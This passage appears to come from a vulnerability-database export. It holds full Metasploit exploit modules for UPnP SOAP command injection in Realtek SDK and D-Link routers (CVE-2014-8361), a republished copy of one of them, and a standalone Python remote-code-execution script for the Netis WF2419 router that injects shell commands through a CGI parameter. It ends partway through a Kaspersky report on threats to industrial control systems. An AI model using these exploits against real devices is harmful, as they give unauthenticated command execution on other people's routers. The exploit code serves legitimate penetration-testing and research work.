send_request_cgi({\n 'uri' => '/InternetGatewayDevice.xml'\n })\n if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /<modelNumber>DIR-/\n return Exploit::CheckCode::Detected\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status(\"Trying to access the device ...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\n end\n\n print_status(\"Exploiting...\")\n\n execute_cmdstager(\n :flavor => :echo,\n :linemax => 400\n )\n end\n\n def execute_command(cmd, opts)\n new_portmapping_descr = rand_text_alpha(8)\n new_external_port = rand(32767) + 32768\n new_internal_port = rand(32767) + 32768\n\n uri = '/soap.cgi'\n\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\n\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\n data_cmd << \"<SOAP-ENV:Body>\"\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\n data_cmd << \"<NewPortMappingDescription>#{new_portmapping_descr}</NewPortMappingDescription>\"\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\n data_cmd << \"<NewEnabled>1</NewEnabled>\"\n data_cmd << \"<NewExternalPort>#{new_external_port}</NewExternalPort>\"\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\n data_cmd << \"<NewInternalPort>#{new_internal_port}</NewInternalPort>\"\n data_cmd << \"</m:AddPortMapping>\"\n data_cmd << \"</SOAP-ENV:Body>\"\n data_cmd << \"</SOAP-ENV:Envelope>\"\n\n begin\n res = send_request_cgi({\n 'uri' => uri,\n 'vars_get' => {\n 'service' => 'WANIPConn1'\n },\n 'ctype' => \"text/xml\",\n 'method' => 'POST',\n 'headers' => {\n 'SOAPAction' => soapaction,\n },\n 'data' => data_cmd\n })\n return res\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/dlink_upnp_exec_noauth.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-07T22:33:28", "description": "Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested successfully on a Trendnet TEW-731BR router with emulation.\n", "published": "2015-05-03T16:09:22", "type": "metasploit", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/HTTP/REALTEK_MINIIGD_UPNP_EXEC_NOAUTH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include REXML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\n 'Description' => %q{\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\n there is no output for the executed command. This module has been tested successfully on a\n Trendnet TEW-731BR router with emulation.\n },\n 'Author' =>\n [\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-8361'],\n ['ZDI', '15-155'],\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\n ],\n 'DisclosureDate' => '2015-04-24',\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'MIPS Little Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'MIPS Big Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n\n register_options(\n [\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\n ])\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/picsdesc.xml'\n })\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\n return Exploit::CheckCode::Detected\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status(\"Trying to access the device ...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\n end\n\n print_status(\"Exploiting...\")\n\n execute_cmdstager(\n :flavor => :echo,\n :linemax => 50,\n :nodelete => true\n )\n end\n\n def execute_command(cmd, opts)\n uri = '/wanipcn.xml'\n soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\n\n begin\n res = send_request_cgi({\n 'uri' => uri,\n 'vars_get' => {\n 'service' => 'WANIPConn1'\n },\n 'ctype' => 'text/xml',\n 'method' => 'POST',\n 'headers' => {\n 'SOAPAction' => soap_action\n },\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\n })\n return res\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\n\n def build_soap_req\n new_external_port = rand(32767) + 32768\n new_internal_port = rand(32767) + 32768\n\n xml = Document.new\n\n xml.add_element(\n 'SOAP-ENV:Envelope',\n {\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\n })\n\n xml.root.add_element('SOAP-ENV:Body')\n\n body = xml.root.elements[1]\n\n body.add_element(\n 'm:AddPortMapping',\n {\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\n })\n\n port_mapping = body.elements[1]\n port_mapping.add_element('NewLeaseDuration')\n port_mapping.add_element('NewInternalClient')\n port_mapping.add_element('NewEnabled')\n port_mapping.add_element('NewExternalPort')\n port_mapping.add_element('NewRemoteHost')\n port_mapping.add_element('NewProtocol')\n port_mapping.add_element('NewInternalPort')\n\n port_mapping.elements['NewLeaseDuration'].text = ''\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\n port_mapping.elements['NewEnabled'].text = '1'\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\n port_mapping.elements['NewRemoteHost'].text = ''\n port_mapping.elements['NewProtocol'].text = 'TCP'\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\n\n xml.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-11T05:23:58", "description": "Exploit for linux platform in category remote exploits", "edition": 2, "published": "2015-06-02T00:00:00", "type": "zdt", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2015-06-02T00:00:00", "id": "1337DAY-ID-23686", "href": "https://0day.today/exploit/description/23686", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include REXML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\r\n 'Description' => %q{\r\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\r\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\r\n there is no output for the executed command. This module has been tested successfully on a\r\n Trendnet TEW-731BR router with emulation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8361'],\r\n ['ZDI', '15-155'],\r\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\r\n ],\r\n 'DisclosureDate' => 'Apr 24 2015',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\r\n ], self.class)\r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/picsdesc.xml'\r\n })\r\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n \r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n \r\n print_status(\"#{peer} - Exploiting...\")\r\n \r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 50,\r\n :nodelete => true\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts)\r\n uri = '/wanipcn.xml'\r\n soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => 'text/xml',\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action\r\n },\r\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n \r\n def build_soap_req\r\n new_external_port = rand(32767) + 32768\r\n new_internal_port = rand(32767) + 32768\r\n \r\n xml = Document.new\r\n \r\n xml.add_element(\r\n 'SOAP-ENV:Envelope',\r\n {\r\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\r\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\r\n })\r\n \r\n xml.root.add_element('SOAP-ENV:Body')\r\n \r\n body = xml.root.elements[1]\r\n \r\n body.add_element(\r\n 'm:AddPortMapping',\r\n {\r\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\r\n })\r\n \r\n port_mapping = body.elements[1]\r\n port_mapping.add_element('NewLeaseDuration')\r\n port_mapping.add_element('NewInternalClient')\r\n port_mapping.add_element('NewEnabled')\r\n port_mapping.add_element('NewExternalPort')\r\n port_mapping.add_element('NewRemoteHost')\r\n port_mapping.add_element('NewProtocol')\r\n port_mapping.add_element('NewInternalPort')\r\n \r\n port_mapping.elements['NewLeaseDuration'].text = ''\r\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\r\n port_mapping.elements['NewEnabled'].text = '1'\r\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\r\n port_mapping.elements['NewRemoteHost'].text = ''\r\n port_mapping.elements['NewProtocol'].text = 'TCP'\r\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\r\n \r\n xml.to_s\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23686"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:26", "description": "\nNetis WF2419 2.2.36123 - Remote Code Execution", "edition": 1, "published": "2020-03-02T00:00:00", "title": "Netis WF2419 2.2.36123 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177", "href": "", "sourceData": "# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa\n# Vendor Homepage: http://www.netis-systems.com\n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75\n# Date: 2020-02-11\n# Version: WF2419 V2.2.36123 => V2.2.36123\n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123\n# CVE : CVE-2019-19356\n\n\n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\"\n\n#!/usr/bin/env python\nimport argparse\nimport requests\nimport json\n\ndef exploit(host,cmd):\n\t# Send Payload\n\theaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n\t\t\t'Content-Type': 'application/x-www-form-urlencoded'}\n\tpost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\"\n\tvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\"\n\treq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)\n\tprint('[+] Payload sent')\n\ttry :\n\t\tjson_data = json.loads(req_payload.text)\n\t\tif json_data[0] == \"SUCCESS\":\n\t\t\tprint('[+] Exploit Sucess')\n\t\t\t# Get Command Result\n\t\t\tprint('[+] Getting Command Output\\n')\n\t\t\tresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\"\n\t\t\tpost_data = \"mode_name=netcore_get&no=no\" \n\t\t\treq_result = requests.post(result_page, data=post_data, headers=headers_value)\n\t\t\tjson_data = json.loads(req_result.text)\n\t\t\tresults = json_data[\"tools_results\"]\n\t\t\tprint results.replace(';', '\\n')\n\t\telse:\n\t\t\tprint('[-] Exploit Failed')\n\texcept:\n \t\tprint(\"[!] You might need to login.\") \n\n# To be implemented\ndef login(user, password):\n\tprint('To be implemented')\n\ndef main():\n host = args.host\n cmd = args.cmd\n user = args.user\n password = args.password\n #login(user,password)\n exploit(host,cmd)\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser(\n description=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\")\n ap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\")\n ap.add_argument(\"cmd\", help=\"Command to run.\")\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\",\n default=\"admin\")\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\",\n default=\"admin\")\n args = ap.parse_args()\n main()", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2018-03-30T15:53:03", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-8759"], "description": "\n\n_For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems \u2013 those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (_[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the second half of 2017. _\n\n_The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security._\n\n## Overview of ICS vulnerabilities identified in 2017\n\n_The analysis of vulnerabilities was performed based on vendor advisories, publicly available information from open vulnerability databases (ICS-CERT, CVE, Siemens Product CERT), as well as the results of Kaspersky Lab ICS CERT's own research. Vulnerability data published on the _[_ICS-CERT_](<https://ics-cert.us-cert.gov/>)_ website in 2017 was used to create statistical diagrams._\n\n### Vulnerabilities in various ICS components\n\n#### Number of vulnerabilities identified\n\nIn 2017, the total number of vulnerabilities identified in different ICS components and published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website was 322. This includes vulnerabilities identified in general-purpose software and in network protocols that are also relevant to industrial software and equipment. These vulnerabilities are discussed in this report separately.\n\n#### Analysis by Industry\n\nThe largest number of vulnerabilities affect industrial control systems in the energy sector (178), manufacturing processes at various enterprises (164), water supply (97) and transportation (74).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png>)\n\n_Number of vulnerable products used in different industries \n(according to [ICS-CERT](<https://ics-cert.us-cert.gov/>) classification) \nvulnerabilities published in 2017_\n\n#### Severity levels of the vulnerabilities identified\n\nMore than half (194) of the vulnerabilities identified in ICS systems were assigned [CVSS v.3.0](<https://www.first.org/cvss>) base scores of 7 or higher, corresponding to a high or critical level of risk.\n\n_Table 1 \u2013 Distribution of published vulnerabilities by risk level_\n\n| **Severity score** \n---|--- \n9 to 10 (critical) | 7 to 8.9 (high) | 4 to 6.9 (medium) | 0 to 3.9 (low) \n**Number of vulnerabilities** | 60 | 134 | 127 | 1 \n \nThe highest severity score of 10 was assigned to vulnerabilities identified in the following products:\n\n * [iniNet Solutions GmbH SCADA Webserver](<https://ics-cert.us-cert.gov/advisories/ICSA-17-264-04>),\n * [Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455](<https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01>),\n * [Hikvision Cameras](<https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01>),\n * [Sierra Wireless AirLink Raven XE and XT](<https://ics-cert.us-cert.gov/advisories/ICSA-17-115-02>),\n * [Schneider Electric Modicon M221 PLCs and SoMachine Basic](<https://ics-cert.us-cert.gov/advisories/ICSA-17-103-02A>),\n * [BINOM3 Electric Power Quality Meter](<https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01A>),\n * [Carlo Gavazzi VMU-C EM and VMU-C PV](<https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03>).\n\nAll vulnerabilities that were assigned the severity rating of 10 have much in common: they have to do with authentication issues, can be exploited remotely and are easy to exploit.\n\nIn addition, the highest severity rating was assigned to a vulnerability in the [Modicon Modbus Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>), which is discussed below.\n\nIt should be noted that the CVSS base score does not account for the aspects of security that are specific to industrial automation systems or for the distinctive characteristics of each organization's industrial processes. This is why, when assessing the severity of a vulnerability, we recommend keeping in mind, in addition to the CVSS score, the possible consequences of its exploitation, such as the non-availability or limited availability of ICS functionality that affects the continuity of the industrial process.\n\n#### Types of vulnerabilities identified\n\nThe most common types of vulnerabilities include buffer overflow (Stack-Based Buffer Overflow, Heap-Based Buffer Overflow) and improper authentication (Improper Authentication).\n\nAt the same time, 23% of all vulnerabilities identified are web-related (Injection, Path Traversal, Cross-Site Request Forgery (CSRF), Cross-Site Scripting) and 21% are associated with authentication issues (Improper Authentication, Authentication Bypass, Missing Authentication for Critical Function) and with access control problems (Access Control, Incorrect Default Permissions, Improper Privilege Management, Credentials Management).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png>)\n\n_Most common vulnerability types_\n\nExploitation of vulnerabilities in various ICS components by attackers can lead to arbitrary code execution, unauthorized control of industrial equipment and that equipment's denial of service (DoS). Importantly, most vulnerabilities (265) can be exploited remotely without authentication and exploiting them does not require the attacker to have any specialized knowledge or superior skills.\n\nExploits have been published for 17 vulnerabilities, increasing the risk of their exploitation for malicious purposes.\n\n#### Vulnerable ICS components\n\nThe largest number of vulnerabilities were identified in:\n\n * SCADA/HMI components (88)**, **\n * networking devices designed for industrial environments (66),\n * PLCs (52),\n * and engineering software (52).\n\nVulnerable components also include protection relays, emergency shutdown systems, environmental monitoring systems and industrial video surveillance systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png>)\n\n_Distribution of vulnerabilities identified by ICS components_\n\n### Vulnerabilities in industrial protocols\n\nAn important part of ICS software security research in 2017 was identifying serious vulnerabilities in implementations of industrial protocols. Specifically, vulnerabilities were identified in the [implementation of the Modbus Protocol in Modicon series controllers](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>) (that vulnerability was assigned a CVSS v. 3 base score of 10), as well as in [implementations of the OPC UA protocol stack](<https://ics-cert.us-cert.gov/advisories/ICSA-17-243-01B>) and in an implementation of the [PROFINET Discovery and Configuration Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-129-01H>). The security issues identified affect entire product families.\n\n### Impact of vulnerabilities in 'traditional' technologies on industrial systems\n\nIn addition to ICS-specific vulnerabilities, a number of serious flaws were identified in H2 2017 in software platforms and network protocols that can be exploited to attack industrial systems.\n\nThe vulnerabilities in the WPA2 protocol unexpectedly turned out to be relevant to industrial solutions. They were found to [affect](<https://ics-cert.kaspersky.com/news/2017/11/15/ics-krack/>) equipment from several vendors, including Cisco, Rockwell Automation, Sierra Wireless, ABB and Siemens. Industrial control systems were also affected by multiple vulnerabilities in [the Dnsmasq DNS server](<https://ics-cert.kaspersky.com/news/2017/12/05/dnsmasq/>), [Java Runtime Environment](<https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02>), [Oracle Java SE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-262-01>), and [Cisco IOS and IOS XE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-094-04>).\n\nVulnerabilities in Intel products can also affect the security of industrial equipment. In the second half of 2017, [information on several vulnerabilities in Intel products](<https://ics-cert.kaspersky.com/news/2017/11/24/intel-updates/>) (ME, SPS and TXE) was published. These vulnerabilities affect mainly SCADA server hardware and industrial computers that use vulnerable CPUs. These include, for example, Automation PC 910 by B&R, Nuvo-5000 by Neousys and the GE Automation RXi2-XP product line. As a rule, vendors do not consider it necessary to release public advisories on vulnerabilities of this type (derived from using third-party technologies). Of course, there are some positive exceptions. For example, Siemens AG has released [an advisory](<https://ics-cert.kaspersky.com/news/2018/03/01/siemens-intel/>) stating that these vulnerabilities affect a range of the company's products. Earlier, the company published [information](<https://cert-portal.siemens.com/productcert/pdf/ssa-874235.pdf>) about similar vulnerabilities in Intel technologies affecting its products.\n\n### IoT device vulnerabilities\n\n2017 was marked by a growing number of vulnerabilities being identified in internet of things (IoT) devices. As a consequence, such vulnerabilities were increasingly often exploited to create botnets. The activity of three new botnets was uncovered in the last two months of 2017 only. These included the [Reaper botnet](<https://ics-cert.kaspersky.com/news/2017/11/09/reaper/>) and new Mirai variants, including the [Satori botnet](<https://ics-cert.kaspersky.com/news/2017/12/14/satori/>).\n\nMultiple vulnerabilities were identified in [Dlink 850L routers](<https://blogs.securiteam.com/index.php/archives/3364>), [WIFICAM wireless IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>), [Vacron network video recorders](<https://blogs.securiteam.com/index.php/archives/3445>) and other devices.\n\nOn top of the new IoT device flaws, some old vulnerabilities are still not closed, such as [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) in Realtek devices and the vulnerability dating back to 2012 that can be exploited to get the configuration of [Serial-to-Ethernet converters](<https://www.bleepingcomputer.com/news/security/thousands-of-serial-to-ethernet-devices-leak-telnet-passwords/>), including the Telnet password, by sending a request on port 30718. The vulnerability in Serial-to-Ethernet converters directly affects the industrial internet of things (IIoT), since many systems that enable the operators of industrial equipment to remotely control its status, modify its settings and control its operation are based on serial interface converters.\n\nThe security of IoT devices is also affected by issues relating to the security of traditional information technology. Specifically, vulnerabilities in implementations of the Bluetooth protocol led to the emergence of the new attack vector, [BlueBorne](<https://ics-cert.kaspersky.com/news/2017/09/15/blueborne/>), which poses a threat to mobile, desktop and IoT operating systems.\n\n## Vulnerabilities identified by Kaspersky Lab ICS CERT\n\nIn 2017, Kaspersky Lab ICS CERT experts not only analyzed the security issues associated with different vendors' ICS components, but also focused on the common ICS components, platforms and technologies used in different vendors' solutions. This type of research is important because vulnerabilities in such components significantly increase the number of potential attack victims. Research in this area continues in 2018.\n\n### Number of vulnerabilities identified\n\nBased on its research, Kaspersky Lab ICS CERT identified 63 vulnerabilities in industrial and IIoT/IoT systems in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby types of components analyzed_\n\nEvery time we identified a vulnerability, we promptly notified the respective product's vendor.\n\n### Number of CVE entries published\n\nDuring 2017, 11 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT. It should be noted that some of these CVE entries were published after vendors closed vulnerabilities information on which had been provided to them in 2016.\n\nInformation on other vulnerabilities identified by Kaspersky Lab ICS CERT experts will be published after these vulnerabilities are closed by the respective vendors.\n\n### Capabilities provided by the vulnerabilities identified\n\nThe largest number of vulnerabilities identified (29) could allow an attacker to cause denial of service (DoS) remotely. 8% of the vulnerabilities identified could allow an attacker to execute arbitrary code remotely on the target system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby capabilities provided_\n\n### Vulnerabilities in ICS components\n\nIn 2017, Kaspersky Lab ICS CERT experts identified 30 vulnerabilities in ICS products from different vendors. These are mainly large automation system vendors, such as Schneider Electric, Siemens, Rockwell Automation, Emerson, and others.\n\n#### Severity ratings of the vulnerabilities identified\n\nTo assess the severity of vulnerabilities identified in ICS components, Kaspersky Lab ICS CERT used its own vulnerability rating system based on the metrics defined in [CVSS v3.0](<https://www.first.org/cvss/v2/faq>) (Common Vulnerability Scoring System) standard, with the following vulnerability severity levels identified:\n\n * least severe: CVSS v3.0 base score of 5.0 or less,\n * medium severity: CVSS v3.0 base score of 5.1 to 6.9 (inclusive),\n * most severe: CVSS v3.0 base score of 7.0 or more.\n\nThe absolute majority of vulnerabilities identified are in the most severe group. These include the [XXE vulnerability in industrial solutions](<https://ics-cert.kaspersky.com/news/2017/09/07/closing-an-xxe-vulnerability-in-siemens-industrial-solutions/>) that use the Discovery Service of the OPC UA protocol stack.\n\n#### Vulnerabilities in OPC UA implementations\n\nOne of the research areas involved searching for vulnerabilities in different implementations of the OPC UA technology. This type of research is needed to improve the overall security level of products from different vendors that use the technology in their solutions. Vulnerabilities in such technologies are a Swiss army knife of sorts for attackers, enabling them to hack industrial systems from different vendors.\n\nA total of 17 critical denial-of-service vulnerabilities were identified during the period.\n\nSome of the vulnerabilities were identified in sample software implementations of various OPC UA functions available in the official Github repository. In the process of communicating to several vendors of industrial automation systems, we found out that many of them had used code from such samples in their product code. This means that the vulnerabilities identified may affect complete product lines from different vendors.\n\n### Vulnerabilities in third-party hardware-based and software solutions\n\nKaspersky Lab ICS CERT experts have also analyzed third-party hardware-based solutions that are widely used in industrial automation systems.\n\nSpecifically, experts analyzed the SafeNet Sentinel hardware-based solution by Gemalto. As a result of the research, [15 vulnerabilities](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>) were identified in the software part of the solution (11 in December 2016 and 4 in 2017). These flaws affect a large number of products that use the vulnerable software, including solutions by ABB, General Electric, HP, Cadac Group, Zemax and other software developers, the number of which may reach 40 thousand, according to some estimates.\n\n### Vulnerabilities in internet of things (IoT and IIoT) components\n\nAnother 